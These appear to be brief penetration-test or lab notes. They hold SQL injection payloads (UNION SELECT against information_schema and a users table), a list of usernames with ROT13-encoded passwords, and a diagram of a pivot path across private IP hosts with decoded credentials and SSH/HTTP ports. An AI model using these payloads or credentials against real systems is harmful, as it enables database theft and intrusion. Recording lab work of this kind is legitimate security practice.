- /etc/hosts


product=7 UNION SELECT table_name,1,column_name FROM information_schema.columns
product=7 UNION SELECT * FROM users

     - Aaron - ncnffjbeqlCn$$jbeq
     - user2 - RntyrfVfNER78 
     - user3 - Obo4GURRnccyrf 
     - Lroth - anotherpassword4THEages

+---------+
|         |  10.50.41.20
|         |  user=user2
+---------+  password=EaglesIsARE78
     |
     V
+---------+
|         |  192.168.28.181
|         |  22
+---------+  80
     |
     V
+---------+
|         | 192.168.28.172
|         | Aaron = apasswordyPa$$word
+---------+
    |
    V
+---------+  
|         |
|         |
+---------+
